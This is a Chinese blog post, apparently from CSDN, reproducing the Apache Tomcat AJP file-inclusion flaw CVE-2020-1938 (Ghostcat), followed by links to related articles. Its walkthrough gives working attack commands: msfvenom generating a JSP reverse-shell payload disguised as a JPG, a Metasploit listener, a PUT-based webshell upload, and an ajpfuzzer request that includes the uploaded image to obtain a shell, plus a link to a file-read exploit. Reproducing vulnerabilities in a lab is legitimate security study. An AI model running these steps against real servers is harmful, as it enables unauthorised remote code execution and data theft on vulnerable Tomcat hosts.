tomcat ajp协议安全限制绕过漏洞_Apache Tomcat文件包含漏洞(CVE20201938)复现

最新推荐文章于 2024-08-12 14:28:03 发布
最新推荐文章于 2024-08-12 14:28:03 发布
阅读量1k 收藏 1
点赞数 1
文章标签: tomcat ajp协议安全限制绕过漏洞
一、漏洞背景 2020年02月20日,国家信息安全漏洞共享平台(CNVD)发布了关于Apache Tomcat文件包含漏洞(CVE-2020-1938/CNVD-2020-10487)的安全公告。Tomcat作为一款免费开源轻量级的web应用服务器,广泛应用于并发量不是很高的场合,Tomact默认端口8080用于处理http请求,Tomcat会监听AJP连接器的8009端口,用于与其他Web服务器通过AJP协议进行交互,由于Tomcat AJP协议存在设计缺陷,攻击者可构造特定的payload读取服务器WEB目录下的任意文件以及可以包含任意文件,若存在上传点,可以获取shell,进一步进行远程代码执行。 二、影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 三、漏洞复现 这里为了更加直观方便的复现CVE-2020-1938,采用WindowsServer + Apache Tomcat 8.5.19环境。 1、搭建环境 首先上官网下载Apache Tomcat 8.5.19,当然别忘了JAVA。 https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.19/ 下载完直接放在服务器任意文件夹,在bin目录开启Tomcat,其实浏览器打开默认端口8080就行,看到熟悉的Tomcat界面说明那就是OK的。 10dc1d020b019585a9b8508bf50a13ac.png 2、msf生成反弹木马 用msf生成一个jsp反弹木马。这里为了更方便接近生产环境我们直接生成一个图片马儿。 bc5fdfcb586ceaa1a73c247401ff8545.png 
msfvenom -p java/jsp_shell_reverse_tcp LHOST=本机IP LPORT=监听端口 R >muma.jpg
OK,已经生成了一个文件名为muma.jpg的图片木马。 接下来我们利用一下metasploit中的exploit/multi/handler后门模块进行攻击。 监听 7dacf7a928937977316dd5c253a3854a.png 
use exploit/multi/handlerset payload java/jsp_shell_reverse_tcpset lhost 本机IPset lport 监听端口
3、任意文件上传 这里我们顺便就用Apache Tomcat 8.5.19来做一个任意文件上传漏洞的复现,在服务器上修改配置文件/conf/web.xml,允许tomcat用PUT方式提交,使其产生一个任意文件上传的漏洞,不多说,自行脑补CVE-2017-12615。 修改tomcat配置文件/conf/web.xml,添加readonly参数,属性改为false。 5a14fda8a338715366c6077cc7431672.png 抓取tomcat页面数据包,修改提交方式为PUT,构造payload,上传webshell 5fcb22507a1b75f6130e5937dd1b7185.png 访问一下这个webshell 89ace67e216489b05b5a1adfb7e2e02c.png 就可以远程执行任意命令了,当然,如果权限不足的话还得提权,这里就不做演示了。 4、反弹shell 回到正题(接第2篇)假设说某个运行在该版本tomcat上的业务有个上传点,我们在上传目录upload上传了我们刚才生成的反弹图片马。 089b8603980b24e7c57e4cd197020ffb.png 下载一个AJP包构造器ajpfuzzer_v0.6.jar 
URL:https://github.com/doyensec/ajpfuzzer/releases
运行java -jarajpfuzzer_v0.6.jar fa05746a4a48a90cd88062be85d8e5b0.png 执行connect 目标ip 8009连接目标端口 8b3477e949fc3341e4a32d72e57c5bf5.png 
java -jar ajpfuzzer_v0.6.jarconnect 目标IP 8009
执行下面命令构造并发送AJP包,其中/upload/muma.jpg为上传的木马路径,其中ma.jsp可以换为任意该web项目中没有的jsp文件,这样tomcat才会去调用DefaultServlet. ac5dc67bca519f5af42e4e9a98cd43a3.png 
forwardrequest 2 "HTTP/1.1" "/ma.jsp" 192.168.194.133 192.168.194.133 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:ma.jsp","javax.servlet.include.path_info:/upload/muma.jpg","javax.servlet.include.servlet_path:/"
请求发送成功后,ma.jpg被当做jsp解析,成功拿到shell 0dfd0d46336962f4c09322a6872e6bab.png 5、Tomcat Ajp协议文件读取漏洞 用大佬写的EXP直接任意文件读取 
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
a96d18e291efc5ded2718411540e81f1.png
KillBoy安全实验室 回归技术本质,引领实战潮流

8b852f48857e17561ea96af82903709a.png

weixin_39999586
关注
漏洞复现Apache Tomcat AJP文件包含漏洞(CVE-2020-1938)
晚风不及你
01-12 887
Apache Tomcat 是一个免费的开源 Web 应用服务器,在中小型企业和个人开发用户中有着广泛的应用。
13-3 tomcat AJP文件包含漏洞(CVE-2020-1938)
weixin_43263566的博客
12-02 1168
CVE-2020-1938 是一个影响 TomcatAJP文件包含漏洞。攻击者可以利用该漏洞通过 Tomcat AJP Connector 读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如配置文件或源码。如果目标应用有文件上传功能,攻击者还可以利用文件包含漏洞实现远程代码执行,造成严重的安全风险。这一漏洞的发现者为长亭科技安全研究员。由于 Tomcat AJP 协议设计上的缺陷,该漏洞存在于 Tomcat 中。影响范围ApacheTomcat 6Apache
apache tomcat ajp协议安全限制绕过漏洞_ApacheTomcatAjp漏洞(CVE20201938)漏洞复现
weixin_31894867的博客
01-18 1641
一、前言Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。此漏洞文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。二、漏洞编号:cnvd-2020-10487cve-2020-193...
Apache Tomcat安全绕过漏洞(CVE-2018-1305)
weixin_30607029的博客
04-23 1478
https://www.freebuf.com/column/163927.html 转载于:https://www.cnblogs.com/diyunpeng/p/10757101.html
WEB渗透-TomcatAjp之LFI&RCE
最新发布
qq_59468567的博客
08-12 460
配合目标文件上传传入服务器。
CVE-2020-1938漏洞复现
kinginone的博客
05-09 348
拥有漏的洞版本: Apache Tomcat 6 Apache Tomcat 7-7.0.100 Apache Tomcat 8-8.5.51 Apache Tomcat 9-9.0.31 本实验版本为Apache Tomcat/9.0.10,实验中使用的环境到相关官网下载 搭建实验环境 Java环境:java -version 下载安装包,进入到其目录下。 cd D:\apache-tomcat-9.0.10-windows-x64\apache-tomcat-9.0.10\bin 运行startup
tomcat ajp协议安全限制绕过漏洞_【高危安全通告】Apache Tomcat 文件包含漏洞CVE20201938)...
weixin_39826809的博客
12-01 155
↑ 点击上方蓝色字关注我们ApacheTomcat都是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat 服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。漏洞原因是由于Apache Tomcat AJP 协议不...
tomcat ajp协议安全限制绕过漏洞_漏洞预警 Apache Tomcat文件包含漏洞CVE20201938)...
weixin_39897505的博客
12-01 181
漏洞背景Apache Tomcat是美国Apache软件基金会的Jakarta项目的一款轻量级免费的开放源代码的Web应用服务器,主要用于开发和调试JSP程序,在世界范围内被广泛使用。近日,CNVD公开了一个Apache Tomcat文件包含漏洞(CVE-2020-1938/CNVD-2020-10487),该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受影响,攻击者可...
tomcat ajp协议安全限制绕过漏洞_Apache Tomcat存在文件包含漏洞
weixin_39992788的博客
12-01 368
网安引领时代,弥天点亮未来Tomcat简介TomcatApache软件基金会Jakarta项目中的一个核心项目,作为目前比较流行的Web应用服务器,深受Java爱好者的喜爱,并得到了部分软件开发商的认可。Tomcat服务器是一个免费的开放源代码的Web应用服务器,被普遍使用在轻量级Web应用服务的构架中。近日,互联网曝光Apache Tomcat服务器中被发现存在文件包含漏洞,攻...
tomcat ajp协议安全限制绕过漏洞_Apache Tomcat文件包含漏洞分析
weixin_39918928的博客
11-29 693
更多安全资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn)一、漏洞概述2020年2月20日,国家信息安全漏洞共享平台(CNVD)发布关于Apache Tomcat安全公告,Apache Tomcat文件包含漏洞(CNVD-2020-10487,对应CVE-2020-1938)。Tomcat AJP协议由于存在实现缺陷导致相关参数可...
Tomcat-Ajp协议任意文件读取漏洞复现(CVE-2020-1938)
1匹黑马
02-22 6761
文章目录影响版本危害漏洞原理漏洞复现修复建议 影响版本 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 危害 文件包含 命令执行 漏洞原理 Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接,被...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
压缩包中含有详细的文档说明、操作指南以及所需要的附件。本作者亲自验证有效。如果有问题,请联系作者QQ。
CVE-2020-1938 Apache-Tomcat-Ajp (幽灵猫)文件包含漏洞复现
alert['Hello World']
11-15 5142
目录漏洞描述影响版本漏洞环境搭建漏洞利用任意文件读取本地包含命令执行,测试ping dnslog反弹shell漏洞加固参考文章 漏洞描述   该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 影响版本 Apache Tomcat 6 Apache Tomcat 7 &lt
ppt修复无法读取_CVE20201938 Tomcat 文件读取/包含漏洞复现
weixin_39975900的博客
12-01 660
0X1漏洞概述日前,长亭科技安全研究人员全球首次发现了一个存在于流行服务器 Tomcat 中的文件读取/包含漏洞,并第一时间提交厂商修复。2月14日,Apache Tomcat 官方发布安全更新版本,修复漏洞。2月20日,国家信息安全漏洞共享平台(CNVD)发布安全公告,该漏洞综合评级为高危,漏洞编号为CNVD-2020-10487,CVE 编号 CVE-2020-1938。漏洞影响...
tomcat ajp协议安全限制绕过漏洞_Aapache Tomcat AJP 文件包含漏洞
weixin_39838758的博客
12-01 203
Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)复现 Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 Ghostcat(幽灵猫)是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP ...
tomcat ajp协议安全限制绕过漏洞_未然公告 | Apache Tomcat AJP CVE20201938漏洞防御指导...
weixin_39589511的博客
12-01 315
Apache Tomcat发布了安全补丁,修补了一个AJP相关的严重漏洞,编号为CVE-2020-1983。Tomcat是目前比较流行的Web应用服务器,其中AJP协议实现存在任意文件读取漏洞。当前公开利用代码已经在互联网发布,存在较高的攻击风险,请涉及的客户及时更新相关补丁或者采取防范措施。漏洞影响攻击者通过该漏洞能够达成以下攻击效果:-读取webapp下任意文件。- 如果服务器端同...
tomcat ajp协议安全限制绕过漏洞_国家信息安全漏洞共享平台发布Apache Tomcat漏洞安全公告...
weixin_39616880的博客
12-10 143
2月22日消息 国家信息安全漏洞共享平台(CNVD)近日发布了一份关于 Apache Tomcat 存在文件包含漏洞安全公告,具体如下: 安全公告编号:CNTA-2020-0004 2020 年 1 月 6 日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的 Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)...
tomcat ajp协议安全限制绕过漏洞_Apache Tomcat发现重大漏洞,已提供解决方案
weixin_39736007的博客
12-10 199
2月20日,CNVD(国家信息安全漏洞共享平台)公告知名Web应用服务器Apache Tomcat被爆存在文件包含漏洞,攻击者可在受影响的Apache Tomcat服务器上非法读取Web目录文件,甚至进一步执行任意代码,威胁信息安全,该漏洞将波及全球约8万台服务器。  Apache Tomcat 是一个免费的开源 Web 应用服务器,在中小型企业和个人开发用户中广泛应用。 由于Tomcat默认开启...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值